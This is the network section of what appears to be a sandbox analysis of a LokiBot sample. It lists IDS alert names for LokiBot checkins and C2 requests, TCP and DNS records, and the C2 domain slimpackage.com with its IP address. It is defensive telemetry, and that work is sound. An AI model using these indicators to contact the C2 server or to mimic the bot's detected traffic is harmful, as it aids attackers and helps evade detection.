              01/14/22-09:54:31.498490TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986380192.168.2.3104.223.93.105
              01/14/22-09:54:31.498490TCP2025381ET TROJAN LokiBot Checkin4986380192.168.2.3104.223.93.105
              01/14/22-09:54:32.828735TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986480192.168.2.3104.223.93.105
              01/14/22-09:54:32.828735TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986480192.168.2.3104.223.93.105
              01/14/22-09:54:32.828735TCP2025381ET TROJAN LokiBot Checkin4986480192.168.2.3104.223.93.105
              01/14/22-09:54:34.246264TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986580192.168.2.3104.223.93.105
              01/14/22-09:54:34.246264TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986580192.168.2.3104.223.93.105
              01/14/22-09:54:34.246264TCP2025381ET TROJAN LokiBot Checkin4986580192.168.2.3104.223.93.105
              01/14/22-09:54:35.583283TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986680192.168.2.3104.223.93.105
              01/14/22-09:54:35.583283TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986680192.168.2.3104.223.93.105
              01/14/22-09:54:35.583283TCP2025381ET TROJAN LokiBot Checkin4986680192.168.2.3104.223.93.105

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Jan 14, 2022 09:52:38.673115015 CET4974280192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:38.797828913 CET8049742104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:38.798329115 CET4974280192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:38.800709009 CET4974280192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:38.925689936 CET8049742104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:38.925797939 CET4974280192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:39.049918890 CET8049742104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:39.061507940 CET8049742104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:39.061574936 CET8049742104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:39.061729908 CET4974280192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:39.061815023 CET4974280192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:39.186889887 CET8049742104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:40.199570894 CET4974380192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:40.322210073 CET8049743104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:40.322340965 CET4974380192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:40.325541973 CET4974380192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:40.452392101 CET8049743104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:40.452498913 CET4974380192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:40.603904009 CET8049743104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:40.603960991 CET8049743104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:40.603991985 CET8049743104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:40.604147911 CET4974380192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:40.604252100 CET4974380192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:40.752100945 CET8049743104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:41.613596916 CET4974480192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:41.737896919 CET8049744104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:41.738023996 CET4974480192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:41.740730047 CET4974480192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:41.864665985 CET8049744104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:41.864794016 CET4974480192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:41.989017010 CET8049744104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:41.998064995 CET8049744104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:41.998087883 CET8049744104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:41.998192072 CET4974480192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:41.998245955 CET4974480192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:42.123435974 CET8049744104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:43.098083973 CET4974580192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:43.220474958 CET8049745104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:43.220649004 CET4974580192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:43.225955009 CET4974580192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:43.348833084 CET8049745104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:43.349733114 CET4974580192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:43.472278118 CET8049745104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:43.481673956 CET8049745104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:43.481735945 CET8049745104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:43.481894970 CET4974580192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:43.483079910 CET4974580192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:43.605353117 CET8049745104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:44.517575026 CET4974680192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:44.641727924 CET8049746104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:44.641813993 CET4974680192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:44.662959099 CET4974680192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:44.787147045 CET8049746104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:44.787275076 CET4974680192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:44.914565086 CET8049746104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:44.925323009 CET8049746104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:44.925517082 CET8049746104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:44.925570011 CET4974680192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:44.925601959 CET4974680192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:45.088896990 CET8049746104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:46.249346018 CET4974780192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:46.373480082 CET8049747104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:46.373621941 CET4974780192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:46.652462959 CET4974780192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:46.776640892 CET8049747104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:46.776705980 CET4974780192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:46.900899887 CET8049747104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:46.909101009 CET8049747104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:46.909140110 CET8049747104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:46.909204960 CET4974780192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:46.909245014 CET4974780192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:47.033881903 CET8049747104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:48.811659098 CET4974880192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:48.934251070 CET8049748104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:48.934369087 CET4974880192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:48.938221931 CET4974880192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:49.060755968 CET8049748104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:49.060915947 CET4974880192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:49.243834019 CET8049748104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:49.243886948 CET8049748104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:49.243917942 CET8049748104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:49.244081974 CET4974880192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:49.244112968 CET4974880192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:49.367177010 CET8049748104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:50.187966108 CET4974980192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:50.311187983 CET8049749104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:50.311356068 CET4974980192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:50.316401958 CET4974980192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:50.509155035 CET8049749104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:50.509278059 CET4974980192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:50.631927013 CET8049749104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:50.639916897 CET8049749104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:50.639950991 CET8049749104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:50.640219927 CET4974980192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:50.640306950 CET4974980192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:50.763415098 CET8049749104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:51.683743000 CET4975080192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:51.808108091 CET8049750104.223.93.105192.168.2.3
              Jan 14, 2022 09:52:51.808275938 CET4975080192.168.2.3104.223.93.105
              Jan 14, 2022 09:52:51.814681053 CET4975080192.168.2.3104.223.93.105

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Jan 14, 2022 09:52:38.638278008 CET5745953192.168.2.38.8.8.8
              Jan 14, 2022 09:52:38.657176971 CET53574598.8.8.8192.168.2.3
              Jan 14, 2022 09:52:40.178615093 CET5787553192.168.2.38.8.8.8
              Jan 14, 2022 09:52:40.198261976 CET53578758.8.8.8192.168.2.3
              Jan 14, 2022 09:52:41.491287947 CET5415453192.168.2.38.8.8.8
              Jan 14, 2022 09:52:41.610778093 CET53541548.8.8.8192.168.2.3
              Jan 14, 2022 09:52:42.955676079 CET5280653192.168.2.38.8.8.8
              Jan 14, 2022 09:52:43.096473932 CET53528068.8.8.8192.168.2.3
              Jan 14, 2022 09:52:44.396620035 CET5391053192.168.2.38.8.8.8
              Jan 14, 2022 09:52:44.515840054 CET53539108.8.8.8192.168.2.3
              Jan 14, 2022 09:52:46.228964090 CET6402153192.168.2.38.8.8.8
              Jan 14, 2022 09:52:46.248193026 CET53640218.8.8.8192.168.2.3
              Jan 14, 2022 09:52:48.792082071 CET6078453192.168.2.38.8.8.8
              Jan 14, 2022 09:52:48.809930086 CET53607848.8.8.8192.168.2.3
              Jan 14, 2022 09:52:50.168030977 CET5114353192.168.2.38.8.8.8
              Jan 14, 2022 09:52:50.185595036 CET53511438.8.8.8192.168.2.3
              Jan 14, 2022 09:52:51.662257910 CET5600953192.168.2.38.8.8.8
              Jan 14, 2022 09:52:51.680947065 CET53560098.8.8.8192.168.2.3
              Jan 14, 2022 09:52:53.089287043 CET5902653192.168.2.38.8.8.8
              Jan 14, 2022 09:52:53.108489990 CET53590268.8.8.8192.168.2.3
              Jan 14, 2022 09:52:54.513963938 CET4957253192.168.2.38.8.8.8
              Jan 14, 2022 09:52:54.534598112 CET53495728.8.8.8192.168.2.3
              Jan 14, 2022 09:52:57.062278032 CET5213053192.168.2.38.8.8.8
              Jan 14, 2022 09:52:57.081229925 CET53521308.8.8.8192.168.2.3
              Jan 14, 2022 09:52:59.459840059 CET5510253192.168.2.38.8.8.8
              Jan 14, 2022 09:52:59.479227066 CET53551028.8.8.8192.168.2.3
              Jan 14, 2022 09:53:01.961615086 CET5623653192.168.2.38.8.8.8
              Jan 14, 2022 09:53:01.981122017 CET53562368.8.8.8192.168.2.3
              Jan 14, 2022 09:53:03.698502064 CET5652753192.168.2.38.8.8.8
              Jan 14, 2022 09:53:03.715970993 CET53565278.8.8.8192.168.2.3
              Jan 14, 2022 09:53:06.771358013 CET4955953192.168.2.38.8.8.8
              Jan 14, 2022 09:53:06.790982008 CET53495598.8.8.8192.168.2.3
              Jan 14, 2022 09:53:08.452569008 CET5265053192.168.2.38.8.8.8
              Jan 14, 2022 09:53:08.471786976 CET53526508.8.8.8192.168.2.3
              Jan 14, 2022 09:53:10.127753973 CET6329753192.168.2.38.8.8.8
              Jan 14, 2022 09:53:10.148004055 CET53632978.8.8.8192.168.2.3
              Jan 14, 2022 09:53:11.543363094 CET5836153192.168.2.38.8.8.8
              Jan 14, 2022 09:53:11.562706947 CET53583618.8.8.8192.168.2.3
              Jan 14, 2022 09:53:13.143388033 CET5361553192.168.2.38.8.8.8
              Jan 14, 2022 09:53:13.262392044 CET53536158.8.8.8192.168.2.3
              Jan 14, 2022 09:53:14.991425037 CET5072853192.168.2.38.8.8.8
              Jan 14, 2022 09:53:15.010253906 CET53507288.8.8.8192.168.2.3
              Jan 14, 2022 09:53:16.526405096 CET5377753192.168.2.38.8.8.8
              Jan 14, 2022 09:53:16.543914080 CET53537778.8.8.8192.168.2.3
              Jan 14, 2022 09:53:18.082562923 CET5710653192.168.2.38.8.8.8
              Jan 14, 2022 09:53:18.101998091 CET53571068.8.8.8192.168.2.3
              Jan 14, 2022 09:53:19.696553946 CET5805853192.168.2.38.8.8.8
              Jan 14, 2022 09:53:19.715605974 CET53580588.8.8.8192.168.2.3
              Jan 14, 2022 09:53:21.026103020 CET6436753192.168.2.38.8.8.8
              Jan 14, 2022 09:53:21.045577049 CET53643678.8.8.8192.168.2.3
              Jan 14, 2022 09:53:22.642846107 CET5153953192.168.2.38.8.8.8
              Jan 14, 2022 09:53:22.662409067 CET53515398.8.8.8192.168.2.3
              Jan 14, 2022 09:53:25.096461058 CET5539353192.168.2.38.8.8.8
              Jan 14, 2022 09:53:25.115611076 CET53553938.8.8.8192.168.2.3
              Jan 14, 2022 09:53:26.482763052 CET6345653192.168.2.38.8.8.8
              Jan 14, 2022 09:53:26.502017975 CET53634568.8.8.8192.168.2.3
              Jan 14, 2022 09:53:27.923367977 CET4925053192.168.2.38.8.8.8
              Jan 14, 2022 09:53:27.941533089 CET53492508.8.8.8192.168.2.3
              Jan 14, 2022 09:53:29.277138948 CET5307953192.168.2.38.8.8.8
              Jan 14, 2022 09:53:29.298034906 CET53530798.8.8.8192.168.2.3
              Jan 14, 2022 09:53:32.222469091 CET5670653192.168.2.38.8.8.8
              Jan 14, 2022 09:53:32.240061998 CET53567068.8.8.8192.168.2.3
              Jan 14, 2022 09:53:34.646564960 CET5356953192.168.2.38.8.8.8
              Jan 14, 2022 09:53:34.666029930 CET53535698.8.8.8192.168.2.3
              Jan 14, 2022 09:53:38.370861053 CET6285553192.168.2.38.8.8.8
              Jan 14, 2022 09:53:38.389735937 CET53628558.8.8.8192.168.2.3
              Jan 14, 2022 09:53:42.318813086 CET5104653192.168.2.38.8.8.8
              Jan 14, 2022 09:53:42.336323023 CET53510468.8.8.8192.168.2.3
              Jan 14, 2022 09:53:50.238415003 CET5346553192.168.2.38.8.8.8
              Jan 14, 2022 09:53:50.257669926 CET53534658.8.8.8192.168.2.3
              Jan 14, 2022 09:53:54.120655060 CET4929053192.168.2.38.8.8.8
              Jan 14, 2022 09:53:54.140160084 CET53492908.8.8.8192.168.2.3
              Jan 14, 2022 09:53:56.889389038 CET5975453192.168.2.38.8.8.8
              Jan 14, 2022 09:53:56.908751011 CET53597548.8.8.8192.168.2.3
              Jan 14, 2022 09:53:59.456651926 CET4923453192.168.2.38.8.8.8
              Jan 14, 2022 09:53:59.475377083 CET53492348.8.8.8192.168.2.3
              Jan 14, 2022 09:54:01.937850952 CET5872053192.168.2.38.8.8.8
              Jan 14, 2022 09:54:01.956938028 CET53587208.8.8.8192.168.2.3
              Jan 14, 2022 09:54:03.356400967 CET5744753192.168.2.38.8.8.8
              Jan 14, 2022 09:54:03.375410080 CET53574478.8.8.8192.168.2.3
              Jan 14, 2022 09:54:04.759175062 CET6358353192.168.2.38.8.8.8
              Jan 14, 2022 09:54:04.778942108 CET53635838.8.8.8192.168.2.3
              Jan 14, 2022 09:54:07.453048944 CET6409953192.168.2.38.8.8.8
              Jan 14, 2022 09:54:07.472659111 CET53640998.8.8.8192.168.2.3
              Jan 14, 2022 09:54:10.560174942 CET6461053192.168.2.38.8.8.8
              Jan 14, 2022 09:54:10.580290079 CET53646108.8.8.8192.168.2.3
              Jan 14, 2022 09:54:14.424412966 CET5198953192.168.2.38.8.8.8
              Jan 14, 2022 09:54:14.443897963 CET53519898.8.8.8192.168.2.3
              Jan 14, 2022 09:54:16.826210022 CET5315253192.168.2.38.8.8.8
              Jan 14, 2022 09:54:16.845690966 CET53531528.8.8.8192.168.2.3
              Jan 14, 2022 09:54:20.161289930 CET6159053192.168.2.38.8.8.8
              Jan 14, 2022 09:54:20.180885077 CET53615908.8.8.8192.168.2.3
              Jan 14, 2022 09:54:22.129714012 CET5607753192.168.2.38.8.8.8
              Jan 14, 2022 09:54:22.149153948 CET53560778.8.8.8192.168.2.3
              Jan 14, 2022 09:54:24.605570078 CET5795153192.168.2.38.8.8.8
              Jan 14, 2022 09:54:24.624635935 CET53579518.8.8.8192.168.2.3
              Jan 14, 2022 09:54:25.971417904 CET5327653192.168.2.38.8.8.8
              Jan 14, 2022 09:54:25.991489887 CET53532768.8.8.8192.168.2.3
              Jan 14, 2022 09:54:27.306365967 CET6013553192.168.2.38.8.8.8
              Jan 14, 2022 09:54:27.325659990 CET53601358.8.8.8192.168.2.3
              Jan 14, 2022 09:54:28.596005917 CET4984953192.168.2.38.8.8.8
              Jan 14, 2022 09:54:28.613475084 CET53498498.8.8.8192.168.2.3
              Jan 14, 2022 09:54:30.029385090 CET6025353192.168.2.38.8.8.8
              Jan 14, 2022 09:54:30.048664093 CET53602538.8.8.8192.168.2.3
              Jan 14, 2022 09:54:31.352067947 CET5870653192.168.2.38.8.8.8
              Jan 14, 2022 09:54:31.371239901 CET53587068.8.8.8192.168.2.3
              Jan 14, 2022 09:54:32.648261070 CET6267753192.168.2.38.8.8.8
              Jan 14, 2022 09:54:32.668024063 CET53626778.8.8.8192.168.2.3
              Jan 14, 2022 09:54:34.090576887 CET6259553192.168.2.38.8.8.8
              Jan 14, 2022 09:54:34.109834909 CET53625958.8.8.8192.168.2.3
              Jan 14, 2022 09:54:35.436048031 CET5118953192.168.2.38.8.8.8
              Jan 14, 2022 09:54:35.455698967 CET53511898.8.8.8192.168.2.3

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
              Jan 14, 2022 09:52:38.638278008 CET192.168.2.38.8.8.80x73a6Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:52:40.178615093 CET192.168.2.38.8.8.80x2372Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:52:41.491287947 CET192.168.2.38.8.8.80x22dbStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:52:42.955676079 CET192.168.2.38.8.8.80x10bcStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:52:44.396620035 CET192.168.2.38.8.8.80x81aaStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:52:46.228964090 CET192.168.2.38.8.8.80x43fdStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:52:48.792082071 CET192.168.2.38.8.8.80xfaa3Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:52:50.168030977 CET192.168.2.38.8.8.80x44dStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:52:51.662257910 CET192.168.2.38.8.8.80xadeStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:52:53.089287043 CET192.168.2.38.8.8.80x8db2Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:52:54.513963938 CET192.168.2.38.8.8.80xc253Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:52:57.062278032 CET192.168.2.38.8.8.80xc65eStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:52:59.459840059 CET192.168.2.38.8.8.80xc212Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:01.961615086 CET192.168.2.38.8.8.80x791eStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:03.698502064 CET192.168.2.38.8.8.80x96c6Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:06.771358013 CET192.168.2.38.8.8.80x44eStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:08.452569008 CET192.168.2.38.8.8.80xd242Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:10.127753973 CET192.168.2.38.8.8.80xe5aaStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:11.543363094 CET192.168.2.38.8.8.80x5691Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:13.143388033 CET192.168.2.38.8.8.80x7cc9Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:14.991425037 CET192.168.2.38.8.8.80x7ef9Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:16.526405096 CET192.168.2.38.8.8.80x6ba7Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:18.082562923 CET192.168.2.38.8.8.80x89dStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:19.696553946 CET192.168.2.38.8.8.80x6477Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:21.026103020 CET192.168.2.38.8.8.80x5995Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:22.642846107 CET192.168.2.38.8.8.80xdc3bStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:25.096461058 CET192.168.2.38.8.8.80xbb7aStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:26.482763052 CET192.168.2.38.8.8.80xe699Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:27.923367977 CET192.168.2.38.8.8.80x9470Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:29.277138948 CET192.168.2.38.8.8.80xc434Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:32.222469091 CET192.168.2.38.8.8.80x2c67Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:34.646564960 CET192.168.2.38.8.8.80x502bStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:38.370861053 CET192.168.2.38.8.8.80x34b2Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:42.318813086 CET192.168.2.38.8.8.80x2d60Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:50.238415003 CET192.168.2.38.8.8.80x9197Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:54.120655060 CET192.168.2.38.8.8.80xb7c1Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:56.889389038 CET192.168.2.38.8.8.80x33b5Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:53:59.456651926 CET192.168.2.38.8.8.80x9b3cStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:01.937850952 CET192.168.2.38.8.8.80x41cfStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:03.356400967 CET192.168.2.38.8.8.80x48f0Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:04.759175062 CET192.168.2.38.8.8.80x2242Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:07.453048944 CET192.168.2.38.8.8.80xc831Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:10.560174942 CET192.168.2.38.8.8.80x389Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:14.424412966 CET192.168.2.38.8.8.80xd0beStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:16.826210022 CET192.168.2.38.8.8.80x8155Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:20.161289930 CET192.168.2.38.8.8.80xfb07Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:22.129714012 CET192.168.2.38.8.8.80x2293Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:24.605570078 CET192.168.2.38.8.8.80xf44eStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:25.971417904 CET192.168.2.38.8.8.80x85e0Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:27.306365967 CET192.168.2.38.8.8.80x50f2Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:28.596005917 CET192.168.2.38.8.8.80xebb1Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:30.029385090 CET192.168.2.38.8.8.80x1a9aStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:31.352067947 CET192.168.2.38.8.8.80x371eStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:32.648261070 CET192.168.2.38.8.8.80xf39eStandard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:34.090576887 CET192.168.2.38.8.8.80x1648Standard query (0)slimpackage.comA (IP address)IN (0x0001)
              Jan 14, 2022 09:54:35.436048031 CET192.168.2.38.8.8.80x4a4bStandard query (0)slimpackage.comA (IP address)IN (0x0001)

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
              Jan 14, 2022 09:52:38.657176971 CET8.8.8.8192.168.2.30x73a6No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:52:40.198261976 CET8.8.8.8192.168.2.30x2372No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:52:41.610778093 CET8.8.8.8192.168.2.30x22dbNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:52:43.096473932 CET8.8.8.8192.168.2.30x10bcNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:52:44.515840054 CET8.8.8.8192.168.2.30x81aaNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:52:46.248193026 CET8.8.8.8192.168.2.30x43fdNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:52:48.809930086 CET8.8.8.8192.168.2.30xfaa3No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:52:50.185595036 CET8.8.8.8192.168.2.30x44dNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:52:51.680947065 CET8.8.8.8192.168.2.30xadeNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:52:53.108489990 CET8.8.8.8192.168.2.30x8db2No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:52:54.534598112 CET8.8.8.8192.168.2.30xc253No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:52:57.081229925 CET8.8.8.8192.168.2.30xc65eNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:52:59.479227066 CET8.8.8.8192.168.2.30xc212No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:01.981122017 CET8.8.8.8192.168.2.30x791eNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:03.715970993 CET8.8.8.8192.168.2.30x96c6No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:06.790982008 CET8.8.8.8192.168.2.30x44eNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:08.471786976 CET8.8.8.8192.168.2.30xd242No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:10.148004055 CET8.8.8.8192.168.2.30xe5aaNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:11.562706947 CET8.8.8.8192.168.2.30x5691No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:13.262392044 CET8.8.8.8192.168.2.30x7cc9No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:15.010253906 CET8.8.8.8192.168.2.30x7ef9No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:16.543914080 CET8.8.8.8192.168.2.30x6ba7No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
              Jan 14, 2022 09:53:18.101998091 CET8.8.8.8192.168.2.30x89dNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
